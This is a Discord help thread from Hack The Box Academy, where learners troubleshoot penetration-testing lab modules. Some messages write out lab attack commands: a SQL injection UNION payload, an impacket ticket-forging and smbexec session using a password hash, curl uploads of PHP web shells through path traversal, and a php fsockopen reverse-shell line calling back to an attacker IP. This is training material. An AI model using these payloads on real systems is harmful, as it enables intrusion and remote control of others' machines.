#modules

1 messages · Page 461 of 1

fathom pendant
#

also try adding -Pn to your scan

opaque marten
#

I did! It gives something like 'Host is up' with no particular info

#

the command was 'nmap -sC -sV -Pn IP'

fathom pendant
#

Also #starting-point ... with the name of the starting point lab you're working on

teal root
# opaque marten here

By default nmap will scan the most common 1000 ports, it seems like no service returned anything. Likely indicating the host is down or you dont have a route to that IP

It is hard to say what the issue is without more context/visibility

opaque marten
fathom pendant
opaque marten
#

oh im sorry

fathom pendant
#

@patent sky the module is above tier 0; please refrain from sharing info from the module. I generally suggest though to restart your vm and trying again

patent sky
fathom pendant
#

did you try switching to tcp or udp vpn, or changing vpn regions?

patent sky
#

Thanks you, it was just a vpn problem... I am so dumb!

runic nacelle
#

can any one help with this api attacks I'm stuck guy's
Exploit another Unrestricted Resource Consumption vulnerability and submit the flag.

terse sedge
#

I'm in Penetration Tester - Attacking common services - Attacking SQL Databases - I have logged into the target with sqsh -S 10.129.203.12 -U htbdbuser -P MSSQLAccess01! -h, but once I'm in, I can't get anywhere. I have tried listing the DB's with SELECT name FROM master.dbo.sysdatabases, but then I can't select any of them with USE master for example.

ashen snow
#

how long should i expect winpeas to take? ive had the target despawn on me twice after running for over an hour and forgetting to extend time

cloud urchin
#

Pretty sure only a few mins is good enough

#

never seen it take anywhere near a single hour let alone several

fathom pendant
#

Sometimes powershell goes 'idle' and pressing a character wakes it up

ashen snow
#

yea im going along with pen test in a nutshell and it has the output going to a file so nothing is being printed to the screen and it just blinks the cursor, system monitor shows activity but i was letting it run in the background while i work and the target machine depsawned before it finished

#

i would wiggle the mouse threw remote desktop and the vm stayed responsive the whole time i was paying attention more than 30 min run time

#

linpeas worked just fine on the linux host

glad flicker
#

on File Upload Attacks -> Limited File Uploads I never get a response from the server on uploading the payloads.
Tried both in-browser and via burp repeater; there's just no response from the server at all. Been trying for a couple of days. Not a 500 or any kind of response on upload / POST request. Request doesn't hang either- just nothing. No follow-up GET / after upload either

Can't do it over HTB VPN or in the attackbox, because the vpn can't reach the site. (Why isn't it behind the VPN?) so using a kali vm. I've tried on bare metal on multiple machines and networks now, and it just doesn't work.

I see that others have this issue, but noone ever mentions a fix. Can someone please save me from this insanity. thanks.

quasi wave
#

hi so for question 1 of the skills assessment of the incident handling process module, I am having trouble accessing Virus Total, which I need to access for the section. I tried chatgpting the process to access virus total but the instructions it gave me on how to do it from TheHive won't work.

#

can someone point me in the right direction?

heady sapphire
#

When recompiling using javac -cp it gives me many error. I am in exploiting web vulnerabilities in Thick Client Applications please help!

terse sedge
#

I'm in Penetration Tester - Attacking common services - Attacking SQL Databases - When I try to crack the hash using hashcat and the pws.list provided in the module, I get nothing. I've also tried rockyou.txt as some have suggested, still get nothing. Any clue?

uneven ore
#

Good evening, can someone help me with the password attacks module? Pass the certificate.

hidden ledge
tight mesa
#

Hi there y'all, sorry if this is a silly question, but anyone know where in GraphQL was mentioned or found (previously) the way to identify the MD5 hash for a password in Mutations chapter?

uneven ore
hidden ledge
#

Maybe go DM to avoid spoiler

hidden ledge
#

Wrong IP or you are not connected to the VPN

sand widget
#

but i am in htb instance

hidden ledge
#

Ip is correct ?

sand widget
#

yes

hidden ledge
#

Did you spawn the target and waited 2-3 minutes ?

#

To let them spawn

sand widget
#

i have tried multiple vpn servers

#

hold up lemme try n wait for 5 minutes as u said

#

i don't think it makes a difference but nvr too wrong to try

hidden ledge
#

Can you even ping the target ?

#

Is the port 3389 open on this target ?

sand widget
#

can ping but port 3389 is closed

hidden ledge
#

So you won’t be able to connect via RDP

sand widget
#

any other way

hidden ledge
#

What ports are open ?

sand widget
#

wait i don't need rdp

#

i connect straight from firefox browser in linux

lavish needle
#

need some help connecting to a wifi network in the** Attacking WPA/WPA2 Wi-Fi Networks** module Enterprise Evil-Twin Attack section. i have all the needed info: domain, username, password, and even cert but still cant connect to the wifi network. furthermore, i even spoofed my mac address to connect however it didnt work... can someone help me? am i missing something??

cloud urchin
lavish needle
#

are you talking about the eap auth method?

cloud urchin
#

You also don't need the domain, the domain prefix in the username is fine

cloud urchin
lavish needle
#

@cloud urchin what else? the previous module i took Wi-Fi Penetration Testing Basics doesnt list any other prerequisites i need to connect to an wpa/wpa2 enterprise network. would you mind sheading some light?

#

or anybody else willing to shed some light for that matter?

heavy dome
#

Any help please...

drowsy grove
#

Does the entire AD Enum and attacks module HAVE to be done from the linux VM provided in the module?

wide narwhal
#

Hey guys, currently doing the "Footprinting" module, lab "easy" . Can I DM someone about the enumeration ? ||I don't get the part with /etc/hosts at all , I'm familiar with the process of doing it but in this scenario I don't understand the logic behind ||

heady sapphire
#

I just completed the thick application modules in attacking common applications . They were the worst two sections in the module . They took me many hours . I just followed the steps but I don’t understand why they were included in the course material . The steps I did can apply only to this specific case as I did not receive any general knowledge why can apply in general cases . Please tell me that they are not needed for the exam

cloud urchin
heady sapphire
#

Bruh I mean I am really frustrated . The module was going very well and straight forward until those two sections

candid field
#

Hi
Who can help we with CWEE path?
I am stuck at NoSQLI skill assessment ll

waxen totem
candid field
#

Hi
Who can help we with CWEE path?
I am stuck at NoSQLI skill assessment ll

digital pendant
nova forum
#

Hello anyone who can help me in "Attacking Wi-Fi Protected Setup - Skills Assessment" ? I am stuck in VirtualCorp PIN finding process in which i noticed that the WPS AP is locked and then there is no way to unlock it ? Is this correct behaviour ?

devout lily
#

Hi, does someone know how DonPAPI works?

#

does it dump credentials from credential locker remotely?

round shadow
candid field
#

Hi
Who can help we with CWEE path?
I am stuck at NoSQLI skill assessment ll

signal chasm
#

hello everyone, I am just starting this adventure and finished the network fundamentals. Last modul, called skill assessment, there are 3 things to do. I am stuck at chapter 3, target aquired. I need to establish a raw ftp connection with netcat. well, this somehow doesnt work. I cannot login it. They say to login with:
USER anonymous[Ctrl+V][Enter][Enter]
PASS anything[Ctrl+V][Enter][Enter]
PASV[Ctrl+V][Enter][Enter]
but i just keep getting the error 451, wrong parameters. Anyone having the same problem? I am very thankful for any hints and helps

fathom pendant
sly grotto
#

hey
in
Android Application Static Analysis
Reversing Hybrid Apps
how should i solve this?
Analyze the APK found inside the attached ZIP file. What is the value of the "message" key after logging into the remote service using the debugging code?
i only have one temp debugging key

signal chasm
sly grotto
#

you solved this?

sly grotto
#

hey man did you solved it?

#

you solved it?

#

you solve it?

#

sry for spam : (

fathom pendant
#

have patience, don't ask multiple people in the span of a minute

#

if the people you're asking are in the US, it's early morning still for them

sly grotto
#

ok i solve it
it was so easy i had typo
|| only send post request with temp_debugging_key ||

devout lily
#

Is lsass.exe invoked during local/AD auth process only?

#

Or during remote auth as well?

brave field
devout lily
#

for example, for outlook logon, is lsass.exe invoked?

brave field
#

LSASS is invoked whenever Windows integrated authentication (NTLM/Kerberos/Negotiate) is used, whether locally or remotely.
It is not invoked for purely application-level or web token–based authentication (like modern Outlook/Office 365 logons). Someone can correct me if I am wrong, though.

devout lily
#

These is the schema about lsass.exe process, the last point in the remote auth is "AD directory services", why?

#

seems like it's mixing AD and remote service

brave field
#

The last point “AD Directory Services” exists because LSASS (on the DC) must query the Active Directory database to validate the user’s credentials or tickets during remote/domain authentication. This is what I think.

devout lily
#

there isn't a complete explaination of this schema in this module

candid field
#

Hello

#

Who can help me with NoSqLI assessment II?

brave field
brave field
devout lily
#

this part is not easy

quartz sundial
quartz sundial
#

anyone?

#

I'm doing everything as in the module; it's a simple command, but the connection isn't working. I don't know how to fix the lab..

autumn pilot
#

Switch to the US VPN region

quartz sundial
pure apex
#

anyone help?

quartz sundial
candid field
#

Hi,
Who can help me with cwee nosqli assessment II?

solar sparrow
#

i am stuck in the question What is the the name of the Program listening on localhost:5901 of the Pwnbox the answer xtigervnc is right or wrong..

fathom pendant
#

What module is this?

lusty flint
#

Module: SQL Injection Fundamentals

Section: Skill Assessment

Link: academy.hackthebox.com/module/33/section/518

In the previous section (reading files) it shows you how to ||check if current user has permissions to read file.||

When I try the same method here that is ||super_priv|| with the ||union injection|| it does not work / throws internal error

Exact Command Used:
||cn’) UNION SELECT 1,2,super_priv,4 FROM mysql.user— ||

Is this because ||super_priv|| doesn’t always exist or ?

pale island
#

for the information gathering web edition fingerprinting, i cannot seem to be able to connect to the vhost. would this require me to ||change the local etc/host file? || or can it be done another way?

brave field
pale island
brave field
#

If a virtual host does not have a DNS record, you can still access it by modifying the hosts file on your local machine. The hosts file allows you to map a domain name to an IP address manually, bypassing DNS resolution.

jaunty niche
#

I'm totaly blind in Injection attack modules in skills assesment I'm unable to get flag I tried js injection to get etc/passwd what should I do after can anyone plz help me?

river grove
olive comet
#

Hello everyone, I hope you guys are doing well. I am currently in the skill assessment of Pivoting and Tunneling in the CPTS path module, I am facing a problem which is kinda weird to me.

I am doing these labs using the tool ligolo-ng I have my pivot host and configured it properly and took access on the internal host

within that network, and when I write ipconfig to see what is the other network I see the same network address but I can't reach it which is x.x.15.34 < this is the one I can ping with ligolo configured.

but the internal host have a second ip which is is x.x.16.34 I can't ping 😄 I already configured ligolo on x.x.0.0/16, I did try double pivot with the same network address but it doesn't work.

because it's the same network address I guess

foggy jackal
#

can i request for help on the ntlm relay attack question 2..compromising the backup01? i keep getting this error message

[-] SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

seems like the spoolss is not running

do_cmd: Could not initialise spoolss. Error was NT_STATUS_OBJECT_NAME_NOT_FOUND 
meager otter
#

You ever get this sorted? Ive been stuck on this for most of the morning...I feel like Im missing something SUPER simple haha.

civic inlet
#

is this to compromise vhost of mail.smtpinjection.htb?

terse sedge
#

I'm in Penetration Tester - Attacking common services - Attacking SQL Databases - Question 2. I have logged into the DB as htbdbuser, or MSSQLSVC. It seems neither have the privilege to do anything. So I tried to impersonate. When I run the commands to list users I can impersonate, I get no results. Any idea?

civic inlet
civic inlet
grim crypt
#

Sorry I don't understand what do you mean. I already searching and try and but still can't get past this.

fathom pendant
grim crypt
fathom pendant
terse sedge
#

@civic inlet Do you mean using the IMPERSONATE function?

#

I tried that, but didn't get any response

carmine needle
#

Can I get some hands on advice for the optional exercise in the Cracking Passwords with Hashcat module?

#

I have made some progress but I dont have much (any) experience exploiting active directory so its a bit lost on me, even though I have cracked a fair few of the hashes

crystal cove
#

finally after 15 weeks 🙌

digital pendant
#

@fathom pendant please may I dm you regarding the cpts path. Regarding a topic thats mentioned but I cant see the how to accomplish it side of things.

digital pendant
raven quail
quartz sundial
# raven quail which vpn server are you using?

hi!

This module is a real problem..

I changed VPN servers, rebooted the lab multiple times, and on one attempt, the server responded to my command. Instead of a DHCP error, I finally got a response from the server, extracted the hash, and cracked it

But now I have another problem. I'm struggling with the following module page, https://academy.hackthebox.com/module/267/section/3050

I launched the lab, configured Ligolo, and ran all the commands as in the course. But the tables I'm seeing are half-empty, even though they should show complete information.

cloud urchin
#

Also please take care not to post content from modules above tier 0

quartz sundial
#

There are probably some problems with the SSCM server again. I've rebooted the lab many times already, but it doesn't help. Neither does changing VPN servers.

raven quail
#

yeah this one's known issue we are working on fix. though it was working fine on US Server afaik.

quartz sundial
quartz sundial
cloud urchin
#

The posting above tier 0 is just a general thing

quartz sundial
#

You scolded me for the screenshot and deleted it, citing the disclosure of confidential information.

cloud urchin
#

Two separate things, and it's a terms of service thing I wouldn't really call it trivial. Not like I muted you or something I just reminded you of the rule.

raven quail
#

calm down guys!! He was just informing you about that not scolding you.

quartz sundial
#

@raven quail Thanks for your response! I hope the problem gets resolved soon.

whole phoenix
#

hello i am currently working on a linux module and trying to connect to ssh but when it asks for my password it will not let me type in the CLI

cloud urchin
snow quartz
#

Hi. I'm working on the Citrix Breakout submodule in Windows Privilege Escalation. I tried to connect to the SMB from the target using \\10.xxx.xxx.xxx\share as the UNC path.

In addition, I have connected to the smbserver.py in XFCE box, but the Citrix couldn't connect to the SMB and instead, it returne an error like this image

Is there any workarounds for this?

pastel basin
#

Hey , can anyone help me in the module "Information gathering -web edition" and the section is "Web Archives" . So in the question number 4 it is not accepting my answer , can anyone tell me what is happening ?

autumn pilot
obsidian oriole
fathom pendant
obsidian oriole
fathom pendant
#

think of it like this; you're looking for a file at http://ip:port/admin/somefile.html

marsh lava
#

Is the job role path Bug Bounty gone? It still changed its name.

storm elk
tawdry raptor
#

is there a reason some of the machines spawned for the exercises are on the open internet and some get spawned in the htb network and need a vpn to access?

#

I feel like they used to all be internal, but more and more they are just spun up on the open internet

fathom pendant
tawdry raptor
#

for example I am doing the "hacking wordpress" module atm, the machine is on the internet and one of the exercises is to put a web shell in the theme

fathom pendant
#

yes web shell, not reverse shell :)

tawdry raptor
#

I guess my question is, why put some on the internet at all, why not keep them all internal?

fathom pendant
#

resource stuff; also a lot easier/cheaper to host basic web apps on a droplet than a dedicated vm for one thing (if the underlying OS isn't what's important)

tawdry raptor
#

that makes sense, I guess as htb has scaled they looked for more cost effective way

#

I feel like in the beginning it was all internal machines

fathom pendant
#

well, some of the modules predate some of the bigger scaling they've done and still have the ip:port, but again as a general rule of thumb -- if it's a public IP - focus on the app (unless instructed otherwise) and not on getting a reverse shell or a way for the machine to call back to you

#

it's a common hiccup in the Getting Started module - Public Exploits Section. People do all this scanning on the public IP, they don't focus on the IP:PORT -- which contains the vulnerability

tawdry raptor
#

For me it raised the question, is there some sort of "permission to attack" baked into the HTB academy TOS? Since these machines are technically just public facing machines and we are attacking them over the internet

fathom pendant
tawdry raptor
#

been a while since I did that one 😛

#

thanks for the info

hasty mauve
#

Module: DACK Attacks II
Section: SPN Jacking
Question: Abuse Gabriel's rights to compromise the account that has WriteSPN on SRVWEB07. Use the live SPN Jacking technique to compromise WEB01 using SRVWEB07 SPN and read the flag located at C:\Users\Administrator\Desktop\flag.txt.

I followed every step / command shown in Live SPN Jacking but it gives me an error when trying to connect to WinRM.
Tried to change the SPN to HTTP/WEB01, WSMAN/WEB01, HOST/WEB01, and even tried RDP with TERMSRV/WEB01.
Nothing is working.

hasty mauve
#

Now I did the same from linux, still not working.

└─$ impacket-getST -spn 'MSSQL/SRVWEB07.inlanefreight.local' -impersonate Administrator 'inlanefreight.local/SRV01$' -hashes :04ff9221b8cdb658d989473f51ae0a42 -dc-ip 172.16.92.10 -altservice "cifs/WEB01.inlanefreight.local"
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Changing service from MSSQL/SRVWEB07.inlanefreight.local@INLANEFREIGHT.LOCAL to cifs/WEB01.inlanefreight.local@INLANEFREIGHT.LOCAL
[*] Saving ticket in Administrator@cifs_WEB01.inlanefreight.local@INLANEFREIGHT.LOCAL.ccache
                                                                                                                                                    
┌──(kali㉿kali)-[~/htbacademy]
└─$ export KRB5CCNAME=Administrator@cifs_WEB01.inlanefreight.local@INLANEFREIGHT.LOCAL.ccache
                                                                                                                                                    
┌──(kali㉿kali)-[~/htbacademy]
└─$ impacket-smbexec -k -no-pass 172.16.92.25
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)
#

nvm, finally did it after a LOT of debugging.

tranquil wren
#

hello, I am on the pass the ticket module for linux (https://academy.hackthebox.com/module/147/section/1657) I am needing help understanding decrypting a hash for the svc_workstations account, when i did the dump i only found a hash for aes-256, which i tried hashcat and crackstation, with no luck, the hint says are there any other keytabs, i found that user and cracked the NTLM hash, but could not ssh with -p 2222 with that user. I used process of elimination, and guessed the password for teh svc_workstation account, but i would really like to understand what to do when running into an aes-256 hash like that, any help woul dbe appreciated

fathom pendant
#

you don't need to crack the aes-256 part; NTLM will do

tranquil wren
#

hmmm, it wasn't displaying the NTLM for that user

#

this is what i got

#

i did find the NTLM for the other user's keytab, but i couldn't log into the the target with that

hidden ledge
#

There is an other way to check for known hashes on internet

boreal karma
#

Hi, I have been working on the LFI skill assessment and am struggling to find uploaded files. I was able to achieve read access and the php ini file does not have an upload dir set, so it should default to system. But when I upload a pdf and try to read it in /tmp or /var/tmp it cannot be found.

#

It also cannot be found in the uploads section of the site.

#

There is more information I can provide if anyone is open to dm, trying to be careful and avoid spoiling.

fathom pendant
fathom pendant
#

@lone ferry those would be subdomains

lone ferry
fathom pendant
lone ferry
#

Yes

fathom pendant
#

also did you try adding --append-domain ?

lone ferry
#

That works. Should add that to the walkthrough writeup.

fathom pendant
#

also you said 'Attacking Common Applications' Skill Assessment 2?

lone ferry
#

Yes. Thanks for the help.

fathom pendant
#

that's the first SA, not the second

#

wait nvm

#

my brain had stuff flipped

#

lol been busy lately

lone ferry
#

Please read the show solution for 2.

fathom pendant
#

i was thinking 3 not 2

lone ferry
#

Ok. Cheers

fathom pendant
#

also don't share solutions from the official writeup; especially since the module is above tier 0

boreal karma
terse sedge
#

I'm in Penetration Tester - Attacking common services - Attacking SQL Databases - Question 2. I have logged into the DB as htbdbuser, or MSSQLSVC. It seems neither have the privilege to do anything. So I tried to impersonate. When I run the commands to list users I can impersonate, I get no results. Any idea?

heady sapphire
#

Hey I am on attacking common applications -> attacking applications connecting to services . However I can get the sql credentials as shown in the course . I get error about memory .

gaunt ibex
quasi wave
#

hi so for the skills assessment of incident handling process, how do I access VirusTotal?

#

I need to know that much for question 1 so I can solve the question

#

I looked for it and tried chatgpting it and didn't get good results

#

can someone give me a hint?

#

I am gonna google it but the results on YouTube aren't very good either

autumn pilot
#

To access VirusTotal you first need to navigate to it, the UI is quite self-explanatory on how to use it

tranquil wren
#

I'm trying to import a ccache file on question 5 on the pass the ticket linux section of the module (https://academy.hackthebox.com/module/147/section/1657), i don't want to paste a screenshot as its the commands and don't want to spoil anything can anyone help? when i run klist it doesn't seem to be using the ccache even though it shows it when i use klist

quasi wave
#

so that already is not self-explanatory

tranquil wren
lilac ferry
#

Hey guys,
Anybody here who would kindly help me a bit with the final skill assesment in SQL Injection fundamentals ? I am a little lost after few steps

tranquil wren
valid imp
#

Quick question:
If curl -k <ip> | grep -i ‘/themes/‘ finds the theme

Why doesn’t wpscan?

upper ruin
#

I had a lot of fun with wpscan

#

Try to construct a comprehensive wpscan for a good output

#

It came in handy with a lot of CTFs

twilit cipher
#

Did you get the help you needed?

#

Did you get the help you needed?

clever lance
#

hey guys, just started the public exploit module. Upon running the exploit it works perfectly fine on the HTB terminal and I retrieve the flag, however when i run the same setup on my kali machine, it has a "server did not respond in an expected way". I can ping the IP, visit the website from my kali machine, but there seems to be some connectivity issue i can't pin point. I've doubled checked all my settings for the exploit, firewalls, vpn, even manually tried to retrieve the file and didn't work. Any one that can help or had same issue, please let me know.

fathom pendant
#

try resetting the lab and trying again

clever lance
fathom pendant
#

not sure what could be wrong with your kali machine then ¯_(ツ)_/¯

grim crypt
clever lance
slate jewel
#

can someone figur out why it is taking infinity to run winPEAS on windows target

#

done the reset servers and instance whats bloking it i dont know

waxen totem
upper ruin
#

Vut yeah as 0x said, check the file with output.

hasty mauve
fervent gale
left lintel
slate jewel
#

windows behave very strange with Linpeas and i am new to powershell and found the file is already downloaded to the folder, no blink or success message no exit code to verify.

obsidian oriole
#

The directory we found above sets the cookie to the md5 hash of the username, as we can see the md5 cookie in the request for the (guest) user. Visit '/skills/' to get a request with a cookie, then try to use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag. Use the "top-usernames-shortlist.txt" wordlist from Seclists.

For some reason, the top-usernames-shortlist.txt file didn't find anything.

fathom pendant
heady sapphire
#

Hey I am on attacking common applications -> attacking applications connecting to services . However I can get the sql credentials as shown in the course . I get error about memory .

#

I also tried b*main+433 but it won’t show me register values

lilac ferry
#

Hello.
I am doing the SQL Injection Fundamentals module and I am a little stuck on the final assessment.
I can make an account with an SQL injection and log in, but I font know what to do next. Could somebody please point me un the right direction ? I cant for the life of me figure out what to do next. There are no responses, no outputs, just always either html error 500 or nothing really happens when I try to play with the burp suite requests.
Dm pls if anybody could help

crisp gate
#

Hello, I'm working on the Skills Assessment - Password Attacks.
I'm having trouble getting ligolo to work properly while working on it. Is there any solution?

pure dove
#

@Module: Password attacks , credential hunting in Linux. I'm not getting how to solve this one. I got access to the logins.json but the username and password was encrypted . I'm not able to access the firefox_decrypt tool to the target.tmechen

gray yacht
cunning fern
#

Hello, windows fundamentals appear to be broken, both smbclient -L SERVER_IP -U htb-student and smbclient '\SERVER_IP\Share' -U htb-student are broken, they return NT_STATUS_IO_TIMEOUT, I tried tweaking in the smb.conf to maybe adjust the min and max protocol but nothing works 🙁

#

can something be done about it?

crisp gate
cunning fern
brave field
crisp gate
brave field
crisp gate
brave field
#

Nice, I'll note this down.

icy egret
#

hello guys, there is new update in sql injection fundamentals, skills assessment, who is able to help me with last question?

hasty mauve
#

Set the MTU 1000

devout lily
#

Hi everyone, are there some modules about AD to learn it? The password attacks module talsk about AD but i dont know what is it

hidden ledge
#

Yes Introduction To Active Directory and AD Enumeration & Attacks

foggy jackal
#

Compromise BACKUP01 and then submit the flag located at 'C:\Users\Administrator\Desktop\flag.txt'
someon to assit me here..i think i know the way but its not working

boreal basalt
#

Hi everyone,

I finished the "Pivoting, Tunneling, and Port Forwarding" Skills Assessment.

But i have a question :

sudo proxychains nmap -Pn -sT -v ip -p 3389

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
proxychains nmap -Pn -sT -v ip -p 3389

PORT     STATE SERVICE
3389/tcp filtered  ms-wbt-server

Is this normal ? they dont talk about this in the modules and i wanted to know why but even the cat struggle to explain

dusk shale
#

I have problem with getting accepted HTTP methods in Bypassing Basic Authentication section in Web Attacks module.
I used the command curl -i -X OPTIONS http://<HOST>:<PORT>/, but got a HTML document without Allow response header.
Does anyone knows why this behavitor occurs?

fathom pendant
fathom pendant
boreal basalt
#

nmap need it for raw packets

hidden ledge
#

Because they were already root

#

When laauching the command

fathom pendant
#

^

#

many people have the bad habit of running around their system as root

boreal basalt
hidden ledge
#

Isnt it by default on ?

fathom pendant
#

no

hidden ledge
#

On kali I mean

fathom pendant
#

no

#

it hasn't been the default on Kali for AGES

hidden ledge
#

Don't use kali that's why I ask

brave field
fathom pendant
#

Kali USED TO have it where your login was root:toor; but then they changed it to a user:pass for the premade vms

plucky urchin
#

hey guys

#

can someone have with me sanity check about hacking wordpress module ?

fathom pendant
#

you're insane; sanity: checked
(i haven't done that module, but it also helps to say which section you're having trouble with)

pale island
#

for the Information Gathering - Web Editionskills assessment. i cannot seem to get to the target "hidden admin directory" i know what the directory is but it just does not let me access the directory. (fixed)

brave field
cunning fern
# brave field which section?

The one with sharing the folder, ill hsve to check with vanilla settings and turning off firewall from private bc i tried it with adjusted config

#

But idk if this is a cknfirmed solution

#

Kinda frustrating since it looks like a known issue that has not been addressed whatsoever

brave field
#

can you tell me the exact section you're referring to?

cunning fern
cunning fern
#

Since im at work r

#

Rn

brave field
#

There's no SMB port open, so you can't use smbclient. Just use RDP to answer the questions.

cunning fern
#

But it didnt help either

brave field
cunning fern
cunning fern
cunning fern
brave field
storm skiff
#

Hey guys, I'm working on the Advanced XSS and CSRF Exploitation - Skills Assessment. I'm stuck at the last part. I've tried variations of the payload shown as an example in that section of the module, but I either get no response or I get ||{"error":"Something went wrong"}||. I know what I'm supposed to do, but I can't seem to figure out how to correctly modify the payload. Is anyone available for help?

boreal basalt
fathom pendant
sick meteor
#

Is there an issue with the HTB academy atm? All locations are showing 100000ms and I can't seem to start an instance

fathom pendant
warm pumice
#

that new blue team cert coming soooooon

covert schooner
#

Hi i am unable to get this answer write in static analysis of android application module

#

Any idea?

cloud urchin
#

@blazing cloak Please don't post content from modules above tier 0

blazing cloak
#

oh sorry, where can i asl for help on this server?

cloud urchin
#

Here, just don't post content from modules above tier 0

blazing cloak
#

haha sure, my bad

#

Hey guys, i've been stuck for some time in the question of cracking the hash of Mark's password. There some information about him that i am supposed to generate a wordlist then mutate it and then perform a dicitionary attack. But it seems like my mutated list isnt working. Any help / advice? thanks in advance
Module: Password Attacks
Section: Writing Custom Wordlists and Rules

gray yacht
fathom pendant
#

@boreal basalt dont dm people witjout asking

boreal basalt
fathom pendant
boreal basalt
fathom pendant
boreal basalt
#

u right mb

blazing cloak
boreal basalt
#

you know a password is a following of word so you got the step 1 create a list

But now you have to use the hashcat rule to create a password like Password2022, Password2022! who is atleast 12 character

#

if you dont understand reread the section (for real, this help a lot)

hidden ledge
#

Hello can I DM someone for help for the Second skill assessment of AD Enum&Attack module I have such a weird thing and I don't want to spoil

fathom pendant
#

$[char] is the format to append a character at the end

#

(Drop the brackets of course)

tiny frigate
#

Just like with several other modules, the newest one on Forensics on Linux also doesn't let you download the Cheat Sheet. I assume the team is aware of that, considering that there have been a few mentions here on Discord already?

#

scratch that, seems to have been fixed for the other ones (that I remember), so just for Linux Forensics now

heady sapphire
#

I am on attacking common application skill assessment 1 . I have command execution by appending &<command> to a url . However commands such as dir work but whoami , powershell etc do not. Any ideas ?

fathom pendant
quaint vale
#

Could anyone give a nudge on Abuse taino's rights to compromise SDE01 and read the flag located at C:\Users\Administrator\Desktop\flag.txt DACL Attacks II Skills Exam. I think I have the right idea, just not sure if I'm executing properly

iron cipher
#

I have an issue with a skill assessment for windows lateral movement I am on the 4th question when it asks what is the password for WSUS admin can someone dm me who has done so i can get a hint or something because i have been doing this for over a week, i did password spray, i did inveigh, i tried looking for the files on the wsus machine, i have tried mimikatz and also tried others sooo i have no clue.

iron cipher
#

@cloud urchin messaged you.

heady sapphire
glad sky
#

Does anybody know why I’m getting these errors and how to potentially fix them?

rustic sage
#

Hey I can't reach the (ACADEMY-PWATTCK-CREDDEV01) for the Attacking Windows Credential Manager in Password Attacks module

#

I tried a new vpn, and resetting but still nada

heady sapphire
rustic sage
heady sapphire
spice sequoia
#

Hi I am currently doing Attacking Common Services Skills Assesment Easy module. I am able to get the credentials and searched online and saw 2 methods via FTP and via SQL.

Can't seem to get the FTP method to work currently. I am able ot upload the shells but can't seem to get it to execute. Anyone faced this issue before and managed to get it working?

spice sequoia
#

Cant figure out if it is a directory traversal issue or a wrong revshell issue

heady sapphire
spice sequoia
#

so far i tried diff shells the latest is Powershell #3(Base64), i copied this shell into this

curl -k -X PUT -H "Host: 10.129.203.7" --basic -u *****:********* --data-binary '<?php shell_exec("SHELL"); ?>' --path-as-is https://10.129.203.7/../../../../../../d.php

then on another terminal i ran nc -lvnp 8001 but theres nothing after i ran

rustic sage
#

you're leaking a password in the url bar brother! also just screenshot lol

glad sky
rustic sage
#

still cannot ping or reach ACADEMY-PWATTCK-CREDDEV01 in Password Attacks > Attacking Windows Credential Manager

glad sky
#

Does anybody know what I’m doing wrong? I’ve been stuck on this part for a bit

rustic sage
#

check if the dit file is the same size

waxen totem
#

you do realize you're supposed to replace the parameter values right?... like lmhash:nthash is not gonna work cos those aren't real hashes, and I assume that SYSTEM also isn't the system file you grabbed

novel valve
#

Hello Guys,
I'm stuck at the graphlql attack module on injection attacks.. I know that I can select the objects like username, password etc. in the SQLi but I can't select the flag in username?
Anybody can help me or can say where is my mistake?

loud oracle
#

Hello guys, in module network Foundations and in the second question when i try to answer it doesnt accept my answer even when that answer is the right one. The question is What is the the name of the Program listening on localhost:5901 of the Pwnbox? what should I do

loud oracle
#

VNC (Virtual Network Computing)

civic fiber
#

Wrong

#

Use netstat and you will see the service with port 5901

civic fiber
loud oracle
waxen totem
loud oracle
#

i found it

#

nevermind

spice sequoia
# rustic sage looks close just reconsider that shell_exec function, also since it's an LFI, th...

hahaha sorry i still dont really get

tried another shell and another path but it doesnt work too
curl -k -X PUT -H "Host: 10.129.203.7" --basic -u *****:********* --data-binary 'php -r '\''$sock=fsockopen("10.10.14.80",8001);shell_exec("zsh <&3 >&3 2>&3");'\''' --path-as-is https://10.129.203.7/../../xampp/htdocs/d.php

for FTP so far i know it should upload to https only. If i upload it to https://10.129.203.7/ I can download see it and download it.

rustic sage
#

a php file with php -r in it won't work

spice sequoia
rustic sage
#

it might not like the indents or spacing...maybe just --data-binary '<?php echo shell_exec($_GET["cmd"]); ?>' and is just going back one folder right?

lapis plinth
fathom pendant
#

So mutating can add length

lapis plinth
#

Good catch. so less than about 8 characters, or there are so many too short lines

narrow sage
wide jungle
#

yo can anyone tell me if the kerberos double hop issue is still a thing even when using ligolo already routed the internal address to our attacking machine

devout lily
#

Hi everyone, does this image rappresent 2 distinct forests or one forest with 2 distinct trees?

#

The section says 2 distinct forests but i dont understand the reason and how to see that

steep skiff
#

attacking common application for splunk and prtg is very laggy

does this happend to you guys as well?

fathom pendant
#

Each domain is its own tree, so dev.inlanefreight.local is its own tree in the inlanefreight forest, dev.freightlogistics.local is its own tree in the freightlogistics forest

late rapids
#

Howdy; I cant quite figure out what I'm doing wrong, and despite trying numerous things and googling, I still cannot figure out what the issue is, so hopefully a set of eyes from a knower could help!

I'm working on the File Upload Attacks Skill Assessment, and pretty much right before the end. I managed to upload a malicious svg file to yoink the source code, and from my understanding of the source code, my php file should bypass the mime filter, the white and blacklist, and everything else...but I'm still getting the only images allowed error.

late rapids
#

Deeply unfortunate, we checked and it appears I am doing it correctly however I still seem to be getting the img error; reset of target, payload change, magicbytes change, and still borked hah

icy plume
#

Hi guys, can you say if I am on correct way for MSSQL, Exchange, and SCCM Attacks SA 3rd question
Please DM to me, thanks~

late rapids
crystal lantern
#

cant solve the Network Enumeration with Nmap, Medium lab question, tried everything
please someone help me
"After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer."

(even i have completed the hard one)

crystal lantern
#

yupp

hidden ledge
#

With Version scanning ?

crystal lantern
#

i found the port number 53 on udp, and its service version as "NLnet Labs NSD"

#

but thats not answer

#

i tried -sC, -sV, and some custom scripts

hidden ledge
#

